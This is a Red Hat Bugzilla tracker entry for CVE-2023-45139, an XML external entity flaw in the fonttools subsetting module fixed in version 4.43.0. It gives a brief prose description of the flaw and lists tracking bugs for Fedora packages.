Bug 2257808 (CVE-2023-45139)
| Summary: | CVE-2023-45139 fonttools: XML External Entity Injection (XXE) Vulnerability | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | TEJ RATHI <trathi> |
| Component: | vulnerability | Assignee: | Product Security <prodsec-ir-bot> |
| Status: | NEW --- | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | ||
| Version: | unspecified | Keywords: | Security |
| Target Milestone: | --- | ||
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | fonttools 4.43.0 | Doc Type: | If docs needed, set a value |
| Doc Text: |
A flaw was found in the subsetting module of FontTools, which contains an XML External Entity Injection (XXE) vulnerability. This flaw allows malicious actors to exploit the parsing of candidate fonts, particularly those with an OT-SVG format that includes an SVG table. Through this vulnerability, attackers can manipulate the system to resolve arbitrary entities, potentially allowing them to include files from the filesystem where FontTools is operating or even initiate web requests from the host system.
|
Story Points: | --- |
| Clone Of: | Environment: | ||
| Last Closed: | Type: | --- | |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | 2257809, 2257810, 2257811 | ||
| Bug Blocks: | 2257812 | ||
|
Description
TEJ RATHI
2024-01-11 06:19:53 UTC
Created fonttools tracking bugs for this issue: Affects: fedora-all [bug 2257809] Created rst2pdf tracking bugs for this issue: Affects: fedora-all [bug 2257810] Created smc-suruma-fonts tracking bugs for this issue: Affects: fedora-all [bug 2257811] |